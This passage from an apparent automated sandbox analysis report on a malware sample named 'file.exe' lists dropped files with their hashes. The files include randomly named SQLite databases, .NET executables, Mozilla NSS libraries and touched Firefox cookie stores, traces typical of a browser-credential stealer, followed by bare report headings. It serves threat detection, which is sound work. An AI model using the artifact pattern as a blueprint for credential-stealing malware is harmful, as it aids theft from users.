C:\ProgramData\EGIIJDHCGCBK\AAFIDG	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	9A809AD8B1FDDA60760BB6253358A1DB	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
C:\ProgramData\EGIIJDHCGCBK\BAAEHD	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	2D903A087A0C793BDB82F6426B1E8EFB	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
C:\ProgramData\EGIIJDHCGCBK\DGIJDA	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1	52701A76A821CDDBC23FB25C3FCA4968	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
C:\ProgramData\EGIIJDHCGCBK\EGIIJD	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\EGIIJDHCGCBK\EGIIJD-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\EGIIJDHCGCBK\FBFCFI	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\ProgramData\EGIIJDHCGCBK\GIJKKK	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1	9E68EA772705B5EC0C83C2A97BB26324	243128040256A9112CEAC269D56AD6B21061FF80	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
C:\ProgramData\EGIIJDHCGCBK\HJKKFI	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\EGIIJDHCGCBK\IJKJJK	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	4BB4A37B8E93E9B0F5D3DF275799D45E	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
C:\ProgramData\EGIIJDHCGCBK\IJKJJK-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\EGIIJDHCGCBK\JDBGHI	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5	9664DAA86F8917816B588C715D97BE07	FAD9771763CD861ED8F3A57004C4B371422B7761	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
C:\ProgramData\EGIIJDHCGCBK\JKFIDG	ASCII text, with very long lines (1769), with CRLF line terminators	7E44458E0A8A3A7D10875BC3B7AE72D1	E5E6AC8676EE3761DAB13A10EB7573C19F48D297	21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
C:\ProgramData\EGIIJDHCGCBK\KKKEBK	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1	7B955D976803304F2C0505431A0CF1CF	E29070081B18DA0EF9D98D4389091962E3D37216	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
C:\ProgramData\GDHDAEBGCAAFIDGCGDHI	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1	9E68EA772705B5EC0C83C2A97BB26324	243128040256A9112CEAC269D56AD6B21061FF80	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
C:\ProgramData\GIJEGDAKEHJECAKEGDHJDHDAFH	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	4BB4A37B8E93E9B0F5D3DF275799D45E	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
C:\ProgramData\HDAFIIDAKJ.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	1EF9BBED957BCD2DF5A639E04A67F8BB	DEA8AF341746162F51E7C37486C43F484B7EAA20	A1259A67819BB78FB8D97596DAEAEE6D01F8CF984DD217C7BF10E1808F3D7C01
C:\ProgramData\IIJJDGHJKKJEBFHJDBGH	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\JJDBAEHIJKJKEBFIEGHIDAAECB	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\ProgramData\KJJJKFIIIJJJECAAEHDB	ASCII text, with very long lines (1769), with CRLF line terminators	7E44458E0A8A3A7D10875BC3B7AE72D1	E5E6AC8676EE3761DAB13A10EB7573C19F48D297	21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_5c39e2f0624fb3ace2547e2d794ca76a89c913_e446d4ea_245f8564-d534-4b59-a8c9-ca98f78cc747\Report.wer	data	AAB3F8AEE15A75DBC088B783FC4F8CD5	C6C014E31441C0CB04940FD7FE0BA3086BF7418A	2EAE2A84CB27A5F97054F6C41636315B8507CF782B866B36D92EF316B45CCD02
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_5c39e2f0624fb3ace2547e2d794ca76a89c913_e446d4ea_fea9f638-5ef5-4df2-b30b-be656963e699\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	DF896C48060E62FCA378F3914BFAE491	50CFACA3D3BF3C9A83189C867BE891930901DDD6	6BF7456B0D128F81BA7FAEA50A7747CF301763A208529EAF10D081ABECB6D5A9
C:\ProgramData\Microsoft\Windows\WER\Temp\WER37EE.tmp.dmp	Mini DuMP crash report, 15 streams, Wed Aug 28 22:46:47 2024, 0x1205a4 type	587CB7215E4B746022D90AFD42E2975E	DC6A65D14D90335208D7D5A78BC549EB0B54FD02	A92F4B7D3CE20B838ACB171E016BCF036B4C69D3D1561963C9219ED49B274EE8
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3918.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	D1296BE78C000EE44131D0E6C0CD12C7	6C6D06E154AC963FEAED8563C737F6F381DC9706	D1C031C9F55D7635EA854B03E2C3DF091EDD61EDDB9B880E96058C46FED92155
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3938.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	22177D4D68270AED99F80523399850C5	F2A9FBB70F1BAB63A42647FF63EDB8B2688B944F	89F7DECB65A4E50A8DEB20E9F77155D059FD56E822711F901C28E036C30FDE9E
C:\ProgramData\Microsoft\Windows\WER\Temp\WER74EC.tmp.dmp	Mini DuMP crash report, 15 streams, Wed Aug 28 20:55:17 2024, 0x1205a4 type	DCFB5601C4505535AFB40746D6AA5B19	57C0D28A9F91A277BC0040DA5D1D3FD426A9E298	BD8EA98D035B3EBCC106CDAB4ED32200F39463E14490FB5B11A66FC5DEF16739
C:\ProgramData\Microsoft\Windows\WER\Temp\WER76F1.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	4E18AD9ED51BFDF1BEB6C2FBD297796C	1BE8C831CFBC54741FE5405279C872084DEEE58C	4BFB7F7B7BCB3FBEFD99BCB00598CC958E40B8FF6A13CCB851A0CDE914DA6ECA
C:\ProgramData\Microsoft\Windows\WER\Temp\WER775F.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	14D60354B3DDFF485F1A966B4680D7EF	FD93A40B5684D2839A1CFFB198A7111CE0B8B5B6	D01B548253CCC237387C19A39F2445CCD3621605FCE9B79FA1DAB01756182C8F
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\userFBKFCFBFID.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	E377DAE8BDF40A95DB250E59842D2915	736FB820155A7511131490D243433C010889A523	549E34CD006E9805549E99590A78FBAD9D5A963CB48D841C553D5CCD40A367B1
C:\Users\userIEHDAFHDHC.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	1EF9BBED957BCD2DF5A639E04A67F8BB	DEA8AF341746162F51E7C37486C43F484B7EAA20	A1259A67819BB78FB8D97596DAEAEE6D01F8CF984DD217C7BF10E1808F3D7C01
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHCGHDHIDH.exe.log	ASCII text, with CRLF line terminators	84CFDB4B995B1DBF543B26B86C863ADC	D2F47764908BF30036CF8248B9FF5541E2711FA2	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HDAFIIDAKJ.exe.log	ASCII text, with CRLF line terminators	84CFDB4B995B1DBF543B26B86C863ADC	D2F47764908BF30036CF8248B9FF5541E2711FA2	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log	ASCII text, with CRLF line terminators	84CFDB4B995B1DBF543B26B86C863ADC	D2F47764908BF30036CF8248B9FF5541E2711FA2	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\userFBKFCFBFID.exe.log	ASCII text, with CRLF line terminators	84CFDB4B995B1DBF543B26B86C863ADC	D2F47764908BF30036CF8248B9FF5541E2711FA2	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\userIEHDAFHDHC.exe.log	ASCII text, with CRLF line terminators	84CFDB4B995B1DBF543B26B86C863ADC	D2F47764908BF30036CF8248B9FF5541E2711FA2	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\sql[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	90E744829865D57082A7F452EDC90DE5	833B178775F39675FA4E55EAB1032353514E1052	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf75d3791d7_vrewqgq[1].exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	1EF9BBED957BCD2DF5A639E04A67F8BB	DEA8AF341746162F51E7C37486C43F484B7EAA20	A1259A67819BB78FB8D97596DAEAEE6D01F8CF984DD217C7BF10E1808F3D7C01
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf818156193_ldjfnsfd[1].exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	E377DAE8BDF40A95DB250E59842D2915	736FB820155A7511131490D243433C010889A523	549E34CD006E9805549E99590A78FBAD9D5A963CB48D841C553D5CCD40A367B1
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Temp\delays.tmp	ISO-8859 text, with very long lines (65536), with no line terminators	B4A41A33E9575CEE3383877E7CC144F2	6B7F929E52318DDA00F3300352FD9E8AD72E3991	E2BFF1AB8FCD76129B0C9A35060ADD3F41D7FB450C3BE307D36D6E18B1348F21
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	2FE1DA9464A620576CF1B32A95C9C508	99C8FE4F14F9C3F63B943913B7F3640265E05A2A	3BF97867A5CC27EF429A4ECC3980024F4B0E50AF4E73D0C621E1D1163DB07E30

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by